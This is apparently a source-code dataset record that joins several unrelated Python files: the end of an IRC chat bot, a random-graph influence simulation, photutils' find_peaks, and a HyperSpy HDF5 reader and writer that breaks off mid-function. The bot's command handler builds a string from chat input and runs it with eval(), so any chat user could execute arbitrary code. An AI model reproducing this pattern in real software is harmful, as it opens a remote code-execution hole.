ENTIRE_MESSAGE = message[-1]
if(ENTIRE_MESSAGE[0] == "!"):
self.command(ENTIRE_MESSAGE)
elif(line.split()[0].strip(":") == "PING"):
self.s.send("PONG %s\r\n" % line.split()[1])
else:
self.moderate(ENTIRE_MESSAGE, name)
def command(self, msg):
name = msg[1:-1:].split()[0]
try:
ans = eval("commands." + name + "." + name + "(\"" + msg[1:-1:] + "\")")
reply = "PRIVMSG "+ self.CHANNEL + " :" + str(ans) + "\r\n"
self.s.send(reply)
except:
pass
def moderate(self, msg, name):
if moderation.mod.scan(msg):
reply = "PRIVMSG "+ self.CHANNEL + " :" + moderation.mod.timeout(name,200) + "\r\n"
self.s.send(reply)
## reply = "PRIVMSG "+ self.CHANNEL + " :Bad boy, :( you know what you did!\r\n"
## self.s.send(reply)
def config(self):
f = open("config.txt", "r")
data = f.readlines()
j = 0
for i in data:
data[j] = i.split()[-1]
j = j + 1
return data
def debug(self, log):
if int(self.flag):
print log
else:
pass
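## Example config.txt layout (config() keeps the last whitespace-separated
## token of each line; the values below are placeholders only):
## username mybotname
## oauth oauth:xxxxxxxxxxxxxxxx
## channel #somechannel
## debug 0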
if __name__ == "__main__":
bot = PyIRCBot()
bot.run()
|
mit
| -26,257,662,847,638,284
| 30.593023
| 95
| 0.475919
| false
| 3.499376
| false
| false
| false
|
yuikns/pattern-counter
|
data/dataset/ER_middle/generate_graph.py
|
1
|
1801
|
import random as ran
import networkx as nx
import Queue
import matplotlib.pyplot as plt
n=150 # number of nodes
p=0.1 # edge selection probability
G=nx.erdos_renyi_graph(n,p)
print "#nodes = ", G.number_of_nodes()
print "#edges = ", G.number_of_edges()
L=1000 # number of logs
influence_probability = 0.35 # activity probability
seed_id = ran.randint(0,n-1)
q = Queue.Queue()
l = 0
q.put((seed_id,0))
G.node[seed_id]['label'] = '0'
logs = []
logs.append((seed_id, 0))
while(not q.empty() and l < L):
l+=1
(node_id, t) = q.get()
neighbors = G.neighbors(node_id)
if len(neighbors) == 0:
node_id = ran.randint(0,n-1)
if G.node[node_id].get('label') != None:
G.node[node_id]['label'] = G.node[node_id].get('label')+"-"+str(t+1)
else:
G.node[node_id]['label'] = str(t+1)
q.put((node_id, t+1))
logs.append((node_id, t+1))
print len(logs)
else:
for neighbor_id in neighbors:
x = ran.random()
if x <= influence_probability:
if G.node[neighbor_id].get('label') != None:
G.node[neighbor_id]['label'] = G.node[neighbor_id].get('label')+"-"+str(t+1)
else:
G.node[neighbor_id]['label'] = str(t+1)
q.put((neighbor_id, t+1))
logs.append((neighbor_id, t+1))
for i in range(G.number_of_nodes()):
print i, " ", G.node[i].get('label')
f = open("graph.txt","w")
f.write(str(G.number_of_nodes())+"\t"+str(G.number_of_edges())+"\n")
for edge in G.edges():
f.write(str(edge[0])+"\t"+str(edge[1])+"\t1.0\n")
f.close()
f = open("node_dict.txt", "w")
for node in range(n):
f.write(str(node)+"\t"+str(node)+"\n")
f.close()
print "#logs = ", len(logs)
f = open("logs.txt", "w")
for log in logs:
f.write(str(log[0])+"\t"+str(log[1])+"\n")
f.close()
nx.draw(G, with_labels=True)
# nx.draw_networkx_labels(G,pos=nx.spring_layout(G))
plt.show()
|
mit
| -1,865,508,281,380,050,700
| 25.101449
| 82
| 0.609661
| false
| 2.391766
| false
| false
| false
|
astropy/photutils
|
photutils/detection/peakfinder.py
|
1
|
7745
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools for finding local peaks in an astronomical
image.
"""
import warnings
from astropy.table import Table
import numpy as np
from ..utils.exceptions import NoDetectionsWarning
__all__ = ['find_peaks']
def find_peaks(data, threshold, box_size=3, footprint=None, mask=None,
border_width=None, npeaks=np.inf, centroid_func=None,
error=None, wcs=None):
"""
    Find local peaks in an image that are above a specified threshold
    value.
Peaks are the maxima above the ``threshold`` within a local region.
The local regions are defined by either the ``box_size`` or
``footprint`` parameters. ``box_size`` defines the local region
around each pixel as a square box. ``footprint`` is a boolean array
where `True` values specify the region shape.
If multiple pixels within a local region have identical intensities,
then the coordinates of all such pixels are returned. Otherwise,
there will be only one peak pixel per local region. Thus, the
defined region effectively imposes a minimum separation between
peaks unless there are identical peaks within the region.
If ``centroid_func`` is input, then it will be used to calculate a
centroid within the defined local region centered on each detected
peak pixel. In this case, the centroid will also be returned in the
output table.
Parameters
----------
data : array_like
The 2D array of the image.
threshold : float or array-like
The data value or pixel-wise data values to be used for the
detection threshold. A 2D ``threshold`` must have the same shape
as ``data``. See `~photutils.segmentation.detect_threshold` for
one way to create a ``threshold`` image.
box_size : scalar or tuple, optional
The size of the local region to search for peaks at every point
in ``data``. If ``box_size`` is a scalar, then the region shape
will be ``(box_size, box_size)``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
footprint : `~numpy.ndarray` of bools, optional
A boolean array where `True` values describe the local footprint
region within which to search for peaks at every point in
``data``. ``box_size=(n, m)`` is equivalent to
``footprint=np.ones((n, m))``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
mask : array_like, bool, optional
A boolean mask with the same shape as ``data``, where a `True`
value indicates the corresponding element of ``data`` is masked.
    border_width : int, optional
The width in pixels to exclude around the border of the
``data``.
npeaks : int, optional
The maximum number of peaks to return. When the number of
detected peaks exceeds ``npeaks``, the peaks with the highest
peak intensities will be returned.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The ``centroid_func``
must accept a 2D `~numpy.ndarray`, have a ``mask`` keyword, and
optionally an ``error`` keyword. The callable object must return
a tuple of two 1D `~numpy.ndarray`\\s, representing the x and y
centroids, respectively.
error : array_like, optional
The 2D array of the 1-sigma errors of the input ``data``.
``error`` is used only if ``centroid_func`` is input (the
``error`` array is passed directly to the ``centroid_func``).
wcs : `None` or WCS object, optional
A world coordinate system (WCS) transformation that
supports the `astropy shared interface for WCS
<https://docs.astropy.org/en/stable/wcs/wcsapi.html>`_
(e.g., `astropy.wcs.WCS`, `gwcs.wcs.WCS`). If `None`, then
the sky coordinates will not be returned in the output
`~astropy.table.Table`.
Returns
-------
output : `~astropy.table.Table` or `None`
A table containing the x and y pixel location of the peaks and
their values. If ``centroid_func`` is input, then the table
will also contain the centroid position. If no peaks are found
then `None` is returned.
"""
from scipy.ndimage import maximum_filter
data = np.asanyarray(data)
if np.all(data == data.flat[0]):
warnings.warn('Input data is constant. No local peaks can be found.',
NoDetectionsWarning)
return None
if not np.isscalar(threshold):
threshold = np.asanyarray(threshold)
if data.shape != threshold.shape:
raise ValueError('A threshold array must have the same shape as '
'the input data.')
# remove NaN values to avoid runtime warnings
nan_mask = np.isnan(data)
if np.any(nan_mask):
data = np.copy(data) # ndarray
data[nan_mask] = np.nanmin(data)
if footprint is not None:
data_max = maximum_filter(data, footprint=footprint, mode='constant',
cval=0.0)
else:
data_max = maximum_filter(data, size=box_size, mode='constant',
cval=0.0)
peak_goodmask = (data == data_max) # good pixels are True
if mask is not None:
mask = np.asanyarray(mask)
if data.shape != mask.shape:
raise ValueError('data and mask must have the same shape')
peak_goodmask = np.logical_and(peak_goodmask, ~mask)
if border_width is not None:
for i in range(peak_goodmask.ndim):
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask[:border_width] = False
peak_goodmask[-border_width:] = False
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask = np.logical_and(peak_goodmask, (data > threshold))
y_peaks, x_peaks = peak_goodmask.nonzero()
peak_values = data[y_peaks, x_peaks]
nxpeaks = len(x_peaks)
if nxpeaks > npeaks:
idx = np.argsort(peak_values)[::-1][:npeaks]
x_peaks = x_peaks[idx]
y_peaks = y_peaks[idx]
peak_values = peak_values[idx]
if nxpeaks == 0:
warnings.warn('No local peaks were found.', NoDetectionsWarning)
return None
# construct the output Table
colnames = ['x_peak', 'y_peak', 'peak_value']
coldata = [x_peaks, y_peaks, peak_values]
table = Table(coldata, names=colnames)
if wcs is not None:
skycoord_peaks = wcs.pixel_to_world(x_peaks, y_peaks)
table.add_column(skycoord_peaks, name='skycoord_peak', index=2)
# perform centroiding
if centroid_func is not None:
from ..centroids import centroid_sources # prevents circular import
if not callable(centroid_func):
raise TypeError('centroid_func must be a callable object')
x_centroids, y_centroids = centroid_sources(
data, x_peaks, y_peaks, box_size=box_size,
footprint=footprint, error=error, mask=mask,
centroid_func=centroid_func)
table['x_centroid'] = x_centroids
table['y_centroid'] = y_centroids
if wcs is not None:
skycoord_centroids = wcs.pixel_to_world(x_centroids, y_centroids)
idx = table.colnames.index('y_centroid') + 1
table.add_column(skycoord_centroids, name='skycoord_centroid',
index=idx)
return table
|
bsd-3-clause
| 3,252,517,488,236,389,400
| 38.116162
| 77
| 0.634732
| false
| 3.973833
| false
| false
| false
|
ericpre/hyperspy
|
hyperspy/io_plugins/hspy.py
|
1
|
31796
|
# -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from distutils.version import LooseVersion
import warnings
import logging
import datetime
import ast
import h5py
import numpy as np
import dask.array as da
from traits.api import Undefined
from hyperspy.misc.utils import ensure_unicode, multiply, get_object_package_info
from hyperspy.axes import AxesManager
_logger = logging.getLogger(__name__)
# Plugin characteristics
# ----------------------
format_name = 'HSPY'
description = \
'The default file format for HyperSpy based on the HDF5 standard'
full_support = False
# Recognised file extension
file_extensions = ['hspy', 'hdf5']
default_extension = 0
# Writing capabilities
writes = True
version = "3.1"
# -----------------------
# File format description
# -----------------------
# The root must contain a group called Experiments
# The experiments group can contain any number of subgroups
# Each subgroup is an experiment or signal
# Each subgroup must contain at least one dataset called data
# The data is an array of arbitrary dimension
# In addition a number equal to the number of dimensions of the data
# dataset + 1 of empty groups called coordinates followed by a number
# must exists with the following attributes:
# 'name'
# 'offset'
# 'scale'
# 'units'
# 'size'
# 'index_in_array'
# The experiment group contains a number of attributes that will be
# directly assigned as class attributes of the Signal instance. In
# addition the experiment groups may contain 'original_metadata' and
# 'metadata'subgroup that will be
# assigned to the same name attributes of the Signal instance as a
# Dictionary Browsers
# The Experiments group can contain attributes that may be common to all
# the experiments and that will be accessible as attributes of the
# Experiments instance
#
# CHANGES
#
# v3.1
# - move metadata.Signal.binned attribute to axes.is_binned parameter
#
# v3.0
# - add Camera and Stage node
# - move tilt_stage to Stage.tilt_alpha
#
# v2.2
# - store more metadata as string: date, time, notes, authors and doi
# - store quantity for intensity axis
#
# v2.1
# - Store the navigate attribute.
# - record_by is stored only for backward compatibility but the axes navigate
# attribute takes precendence over record_by for files with version >= 2.1
# v1.3
# ----
# - Added support for lists, tuples and binary strings
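# Illustrative sketch only (derived from the description above and the reader
# code below): a typical file is laid out roughly as
#
# /Experiments/<title>/data (N-dimensional dataset)
# /Experiments/<title>/axis-0 ... axis-(N-1) (axis attribute groups)
# /Experiments/<title>/metadata (nested groups and attributes)
# /Experiments/<title>/original_metadata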
not_valid_format = 'The file is not a valid HyperSpy hdf5 file'
current_file_version = None # Format version of the file being read
default_version = LooseVersion(version)
def get_hspy_format_version(f):
if "file_format_version" in f.attrs:
version = f.attrs["file_format_version"]
if isinstance(version, bytes):
version = version.decode()
if isinstance(version, float):
version = str(round(version, 2))
elif "Experiments" in f:
# Chances are that this is a HSpy hdf5 file version 1.0
version = "1.0"
elif "Analysis" in f:
# Starting version 2.0 we have "Analysis" field as well
version = "2.0"
else:
raise IOError(not_valid_format)
return LooseVersion(version)
def file_reader(filename, backing_store=False,
lazy=False, **kwds):
"""Read data from hdf5 files saved with the hyperspy hdf5 format specification
Parameters
----------
filename: str
lazy: bool
Load image lazily using dask
**kwds, optional
"""
try:
# in case blosc compression is used
import hdf5plugin
except ImportError:
pass
mode = kwds.pop('mode', 'r')
f = h5py.File(filename, mode=mode, **kwds)
# Getting the format version here also checks if it is a valid HSpy
# hdf5 file, so the following two lines must not be deleted or moved
# elsewhere.
global current_file_version
current_file_version = get_hspy_format_version(f)
global default_version
if current_file_version > default_version:
warnings.warn(
"This file was written using a newer version of the "
"HyperSpy hdf5 file format. I will attempt to load it, but, "
"if I fail, it is likely that I will be more successful at "
"this and other tasks if you upgrade me.")
models_with_signals = []
standalone_models = []
if 'Analysis/models' in f:
try:
m_gr = f.require_group('Analysis/models')
for model_name in m_gr:
if '_signal' in m_gr[model_name].attrs:
key = m_gr[model_name].attrs['_signal']
# del m_gr[model_name].attrs['_signal']
res = hdfgroup2dict(
m_gr[model_name],
lazy=lazy)
del res['_signal']
models_with_signals.append((key, {model_name: res}))
else:
standalone_models.append(
{model_name: hdfgroup2dict(
m_gr[model_name], lazy=lazy)})
except TypeError:
raise IOError(not_valid_format)
experiments = []
exp_dict_list = []
if 'Experiments' in f:
for ds in f['Experiments']:
if isinstance(f['Experiments'][ds], h5py.Group):
if 'data' in f['Experiments'][ds]:
experiments.append(ds)
# Parse the file
for experiment in experiments:
exg = f['Experiments'][experiment]
exp = hdfgroup2signaldict(exg, lazy)
# assign correct models, if found:
_tmp = {}
for (key, _dict) in reversed(models_with_signals):
if key == exg.name:
_tmp.update(_dict)
models_with_signals.remove((key, _dict))
exp['models'] = _tmp
exp_dict_list.append(exp)
for _, m in models_with_signals:
standalone_models.append(m)
exp_dict_list.extend(standalone_models)
if not len(exp_dict_list):
raise IOError('This is not a valid HyperSpy HDF5 file. '
'You can still load the data using a hdf5 reader, '
'e.g. h5py, and manually create a Signal. '
'Please, refer to the User Guide for details')
if not lazy:
f.close()
return exp_dict_list
def hdfgroup2signaldict(group, lazy=False):
global current_file_version
global default_version
if current_file_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
exp = {'metadata': hdfgroup2dict(
group[metadata], lazy=lazy),
'original_metadata': hdfgroup2dict(
group[original_metadata], lazy=lazy),
'attributes': {}
}
if "package" in group.attrs:
# HyperSpy version is >= 1.5
exp["package"] = group.attrs["package"]
exp["package_version"] = group.attrs["package_version"]
else:
        # Prior to v1.4 we didn't store the package information. Since there
        # were already external packages, we cannot assume any package
        # provider, so we leave this empty.
exp["package"] = ""
exp["package_version"] = ""
data = group['data']
if lazy:
data = da.from_array(data, chunks=data.chunks)
exp['attributes']['_lazy'] = True
else:
data = np.asanyarray(data)
exp['data'] = data
axes = []
for i in range(len(exp['data'].shape)):
try:
axes.append(dict(group['axis-%i' % i].attrs))
axis = axes[-1]
for key, item in axis.items():
if isinstance(item, np.bool_):
axis[key] = bool(item)
else:
axis[key] = ensure_unicode(item)
except KeyError:
break
if len(axes) != len(exp['data'].shape): # broke from the previous loop
try:
axes = [i for k, i in sorted(iter(hdfgroup2dict(
group['_list_' + str(len(exp['data'].shape)) + '_axes'],
lazy=lazy).items()))]
except KeyError:
raise IOError(not_valid_format)
exp['axes'] = axes
if 'learning_results' in group.keys():
exp['attributes']['learning_results'] = \
hdfgroup2dict(
group['learning_results'],
lazy=lazy)
if 'peak_learning_results' in group.keys():
exp['attributes']['peak_learning_results'] = \
hdfgroup2dict(
group['peak_learning_results'],
lazy=lazy)
# If the title was not defined on writing the Experiment is
# then called __unnamed__. The next "if" simply sets the title
# back to the empty string
if "General" in exp["metadata"] and "title" in exp["metadata"]["General"]:
if '__unnamed__' == exp['metadata']['General']['title']:
exp['metadata']["General"]['title'] = ''
if current_file_version < LooseVersion("1.1"):
# Load the decomposition results written with the old name,
# mva_results
if 'mva_results' in group.keys():
exp['attributes']['learning_results'] = hdfgroup2dict(
group['mva_results'], lazy=lazy)
if 'peak_mva_results' in group.keys():
exp['attributes']['peak_learning_results'] = hdfgroup2dict(
group['peak_mva_results'], lazy=lazy)
# Replace the old signal and name keys with their current names
if 'signal' in exp['metadata']:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp['metadata']["Signal"]['signal_type'] = \
exp['metadata']['signal']
del exp['metadata']['signal']
if 'name' in exp['metadata']:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp['metadata']['General']['title'] = \
exp['metadata']['name']
del exp['metadata']['name']
if current_file_version < LooseVersion("1.2"):
if '_internal_parameters' in exp['metadata']:
exp['metadata']['_HyperSpy'] = \
exp['metadata']['_internal_parameters']
del exp['metadata']['_internal_parameters']
if 'stacking_history' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Stacking_history"] = \
exp['metadata']['_HyperSpy']['stacking_history']
del exp['metadata']['_HyperSpy']["stacking_history"]
if 'folding' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Folding"] = \
exp['metadata']['_HyperSpy']['folding']
del exp['metadata']['_HyperSpy']["folding"]
if 'Variance_estimation' in exp['metadata']:
if "Noise_properties" not in exp["metadata"]:
exp["metadata"]["Noise_properties"] = {}
exp['metadata']['Noise_properties']["Variance_linear_model"] = \
exp['metadata']['Variance_estimation']
del exp['metadata']['Variance_estimation']
if "TEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["TEM"] = \
exp["metadata"]["TEM"]
del exp["metadata"]["TEM"]
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
if "EELS" in tem:
if "dwell_time" in tem:
tem["EELS"]["dwell_time"] = tem["dwell_time"]
del tem["dwell_time"]
if "dwell_time_units" in tem:
tem["EELS"]["dwell_time_units"] = tem["dwell_time_units"]
del tem["dwell_time_units"]
if "exposure" in tem:
tem["EELS"]["exposure"] = tem["exposure"]
del tem["exposure"]
if "exposure_units" in tem:
tem["EELS"]["exposure_units"] = tem["exposure_units"]
del tem["exposure_units"]
if "Detector" not in tem:
tem["Detector"] = {}
tem["Detector"] = tem["EELS"]
del tem["EELS"]
if "EDS" in tem:
if "Detector" not in tem:
tem["Detector"] = {}
if "EDS" not in tem["Detector"]:
tem["Detector"]["EDS"] = {}
tem["Detector"]["EDS"] = tem["EDS"]
del tem["EDS"]
del tem
if "SEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["SEM"] = \
exp["metadata"]["SEM"]
del exp["metadata"]["SEM"]
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "EDS" in sem:
if "Detector" not in sem:
sem["Detector"] = {}
if "EDS" not in sem["Detector"]:
sem["Detector"]["EDS"] = {}
sem["Detector"]["EDS"] = sem["EDS"]
del sem["EDS"]
del sem
if "Sample" in exp["metadata"] and "Xray_lines" in exp[
"metadata"]["Sample"]:
exp["metadata"]["Sample"]["xray_lines"] = exp[
"metadata"]["Sample"]["Xray_lines"]
del exp["metadata"]["Sample"]["Xray_lines"]
for key in ["title", "date", "time", "original_filename"]:
if key in exp["metadata"]:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp["metadata"]["General"][key] = exp["metadata"][key]
del exp["metadata"][key]
for key in ["record_by", "signal_origin", "signal_type"]:
if key in exp["metadata"]:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp["metadata"]["Signal"][key] = exp["metadata"][key]
del exp["metadata"][key]
if current_file_version < LooseVersion("3.0"):
if "Acquisition_instrument" in exp["metadata"]:
# Move tilt_stage to Stage.tilt_alpha
# Move exposure time to Detector.Camera.exposure_time
if "TEM" in exp["metadata"]["Acquisition_instrument"]:
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
exposure = None
if "tilt_stage" in tem:
tem["Stage"] = {"tilt_alpha": tem["tilt_stage"]}
del tem["tilt_stage"]
if "exposure" in tem:
exposure = "exposure"
# Digital_micrograph plugin was parsing to 'exposure_time'
# instead of 'exposure': need this to be compatible with
# previous behaviour
if "exposure_time" in tem:
exposure = "exposure_time"
if exposure is not None:
if "Detector" not in tem:
tem["Detector"] = {"Camera": {
"exposure": tem[exposure]}}
tem["Detector"]["Camera"] = {"exposure": tem[exposure]}
del tem[exposure]
# Move tilt_stage to Stage.tilt_alpha
if "SEM" in exp["metadata"]["Acquisition_instrument"]:
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "tilt_stage" in sem:
sem["Stage"] = {"tilt_alpha": sem["tilt_stage"]}
del sem["tilt_stage"]
return exp
def dict2hdfgroup(dictionary, group, **kwds):
"Recursive writer of dicts and signals"
from hyperspy.misc.utils import DictionaryTreeBrowser
from hyperspy.signal import BaseSignal
def parse_structure(key, group, value, _type, **kwds):
try:
# Here we check if there are any signals in the container, as
# casting a long list of signals to a numpy array takes a very long
# time. So we check if there are any, and save numpy the trouble
if np.any([isinstance(t, BaseSignal) for t in value]):
tmp = np.array([[0]])
else:
tmp = np.array(value)
except ValueError:
tmp = np.array([[0]])
if tmp.dtype == np.dtype('O') or tmp.ndim != 1:
dict2hdfgroup(dict(zip(
[str(i) for i in range(len(value))], value)),
group.create_group(_type + str(len(value)) + '_' + key),
**kwds)
elif tmp.dtype.type is np.unicode_:
if _type + key in group:
del group[_type + key]
group.create_dataset(_type + key,
tmp.shape,
dtype=h5py.special_dtype(vlen=str),
**kwds)
group[_type + key][:] = tmp[:]
else:
if _type + key in group:
del group[_type + key]
group.create_dataset(
_type + key,
data=tmp,
**kwds)
for key, value in dictionary.items():
if isinstance(value, dict):
dict2hdfgroup(value, group.create_group(key),
**kwds)
elif isinstance(value, DictionaryTreeBrowser):
dict2hdfgroup(value.as_dictionary(),
group.create_group(key),
**kwds)
elif isinstance(value, BaseSignal):
kn = key if key.startswith('_sig_') else '_sig_' + key
write_signal(value, group.require_group(kn))
elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):
overwrite_dataset(group, value, key, **kwds)
elif value is None:
group.attrs[key] = '_None_'
elif isinstance(value, bytes):
try:
# binary string if has any null characters (otherwise not
# supported by hdf5)
value.index(b'\x00')
group.attrs['_bs_' + key] = np.void(value)
except ValueError:
group.attrs[key] = value.decode()
elif isinstance(value, str):
group.attrs[key] = value
elif isinstance(value, AxesManager):
dict2hdfgroup(value.as_dictionary(),
group.create_group('_hspy_AxesManager_' + key),
**kwds)
elif isinstance(value, list):
if len(value):
parse_structure(key, group, value, '_list_', **kwds)
else:
group.attrs['_list_empty_' + key] = '_None_'
elif isinstance(value, tuple):
if len(value):
parse_structure(key, group, value, '_tuple_', **kwds)
else:
group.attrs['_tuple_empty_' + key] = '_None_'
elif value is Undefined:
continue
else:
try:
group.attrs[key] = value
except BaseException:
_logger.exception(
"The hdf5 writer could not write the following "
"information in the file: %s : %s", key, value)
def get_signal_chunks(shape, dtype, signal_axes=None):
"""Function that calculates chunks for the signal, preferably at least one
chunk per signal space.
Parameters
----------
shape : tuple
        the shape of the dataset to be stored / chunked
dtype : {dtype, string}
the numpy dtype of the data
signal_axes: {None, iterable of ints}
the axes defining "signal space" of the dataset. If None, the default
h5py chunking is performed.
"""
typesize = np.dtype(dtype).itemsize
if signal_axes is None:
return h5py._hl.filters.guess_chunk(shape, None, typesize)
# largely based on the guess_chunk in h5py
CHUNK_MAX = 1024 * 1024
want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize
if want_to_keep >= CHUNK_MAX:
chunks = [1 for _ in shape]
for i in signal_axes:
chunks[i] = shape[i]
return tuple(chunks)
chunks = [i for i in shape]
idx = 0
navigation_axes = tuple(i for i in range(len(shape)) if i not in
signal_axes)
nchange = len(navigation_axes)
while True:
chunk_bytes = multiply(chunks) * typesize
if chunk_bytes < CHUNK_MAX:
break
if multiply([chunks[i] for i in navigation_axes]) == 1:
break
change = navigation_axes[idx % nchange]
chunks[change] = np.ceil(chunks[change] / 2.0)
idx += 1
return tuple(int(x) for x in chunks)
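# Illustrative sketch (not part of the original module): for a hypothetical
# 4-D dataset of shape (32, 32, 512, 512) stored as float64 with
# signal_axes=(2, 3), a single signal plane is already 512*512*8 bytes = 2 MiB,
# which exceeds CHUNK_MAX, so the function keeps one whole signal per chunk and
# collapses the navigation dimensions:
#   get_signal_chunks((32, 32, 512, 512), 'float64', signal_axes=(2, 3))
#   # -> (1, 1, 512, 512)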
def overwrite_dataset(group, data, key, signal_axes=None, chunks=None, **kwds):
if chunks is None:
if isinstance(data, da.Array):
# For lazy dataset, by default, we use the current dask chunking
chunks = tuple([c[0] for c in data.chunks])
else:
# If signal_axes=None, use automatic h5py chunking, otherwise
# optimise the chunking to contain at least one signal per chunk
chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)
if np.issubdtype(data.dtype, np.dtype('U')):
# Saving numpy unicode type is not supported in h5py
data = data.astype(np.dtype('S'))
if data.dtype == np.dtype('O'):
# For saving ragged array
# http://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data
group.require_dataset(key,
chunks,
dtype=h5py.special_dtype(vlen=data[0].dtype),
**kwds)
group[key][:] = data[:]
maxshape = tuple(None for _ in data.shape)
got_data = False
while not got_data:
try:
these_kwds = kwds.copy()
these_kwds.update(dict(shape=data.shape,
dtype=data.dtype,
exact=True,
maxshape=maxshape,
chunks=chunks,
shuffle=True,))
# If chunks is True, the `chunks` attribute of `dset` below
# contains the chunk shape guessed by h5py
dset = group.require_dataset(key, **these_kwds)
got_data = True
except TypeError:
            # if the shape or dtype/etc. do not match,
            # delete the old dataset and create a new one on the next loop run
del group[key]
if dset == data:
        # dset is just a reference to the already-created dataset
pass
else:
_logger.info(f"Chunks used for saving: {dset.chunks}")
if isinstance(data, da.Array):
if data.chunks != dset.chunks:
data = data.rechunk(dset.chunks)
da.store(data, dset)
elif data.flags.c_contiguous:
dset.write_direct(data)
else:
dset[:] = data
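# Illustrative sketch (file and group names are hypothetical, not from the
# original module): overwriting a dataset in an open h5py file and letting
# get_signal_chunks pick a chunking that holds at least one signal per chunk.
#   with h5py.File('example.hspy', 'a') as f:
#       g = f.require_group('Experiments/demo')
#       overwrite_dataset(g, np.random.rand(4, 4, 128, 128), 'data',
#                         signal_axes=(2, 3), compression='gzip')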
def hdfgroup2dict(group, dictionary=None, lazy=False):
if dictionary is None:
dictionary = {}
for key, value in group.attrs.items():
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, (np.string_, str)):
if value == '_None_':
value = None
elif isinstance(value, np.bool_):
value = bool(value)
elif isinstance(value, np.ndarray) and value.dtype.char == "S":
# Convert strings to unicode
value = value.astype("U")
if value.dtype.str.endswith("U1"):
value = value.tolist()
# skip signals - these are handled below.
if key.startswith('_sig_'):
pass
elif key.startswith('_list_empty_'):
dictionary[key[len('_list_empty_'):]] = []
elif key.startswith('_tuple_empty_'):
dictionary[key[len('_tuple_empty_'):]] = ()
elif key.startswith('_bs_'):
dictionary[key[len('_bs_'):]] = value.tobytes()
        # The following two elif statements enable reading date and time from
        # v < 2 of HyperSpy's metadata specifications
elif key.startswith('_datetime_date'):
date_iso = datetime.date(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
elif key.startswith('_datetime_time'):
date_iso = datetime.time(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
else:
dictionary[key] = value
if not isinstance(group, h5py.Dataset):
for key in group.keys():
if key.startswith('_sig_'):
from hyperspy.io import dict2signal
dictionary[key[len('_sig_'):]] = (
dict2signal(hdfgroup2signaldict(
group[key], lazy=lazy)))
elif isinstance(group[key], h5py.Dataset):
dat = group[key]
kn = key
if key.startswith("_list_"):
if (h5py.check_string_dtype(dat.dtype) and
hasattr(dat, 'asstr')):
# h5py 3.0 and newer
# https://docs.h5py.org/en/3.0.0/strings.html
dat = dat.asstr()[:]
ans = np.array(dat)
ans = ans.tolist()
kn = key[6:]
elif key.startswith("_tuple_"):
ans = np.array(dat)
ans = tuple(ans.tolist())
kn = key[7:]
elif dat.dtype.char == "S":
ans = np.array(dat)
try:
ans = ans.astype("U")
except UnicodeDecodeError:
# There are some strings that must stay in binary,
# for example dill pickles. This will obviously also
# let "wrong" binary string fail somewhere else...
pass
elif lazy:
ans = da.from_array(dat, chunks=dat.chunks)
else:
ans = np.array(dat)
dictionary[kn] = ans
elif key.startswith('_hspy_AxesManager_'):
dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
elif key.startswith('_list_'):
dictionary[key[7 + key[6:].find('_'):]] = \
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))]
elif key.startswith('_tuple_'):
dictionary[key[8 + key[7:].find('_'):]] = tuple(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
else:
dictionary[key] = {}
hdfgroup2dict(
group[key],
dictionary[key],
lazy=lazy)
return dictionary
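# Illustrative sketch (path and file name are hypothetical): reading a metadata
# group written by dict2hdfgroup back into a plain dictionary.
#   with h5py.File('example.hspy', 'r') as f:
#       md = hdfgroup2dict(f['Experiments/demo/metadata'])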
def write_signal(signal, group, **kwds):
"Writes a hyperspy signal to a hdf5 group"
group.attrs.update(get_object_package_info(signal))
if default_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
if 'compression' not in kwds:
kwds['compression'] = 'gzip'
for axis in signal.axes_manager._axes:
axis_dict = axis.get_axis_dictionary()
coord_group = group.create_group(
'axis-%s' % axis.index_in_array)
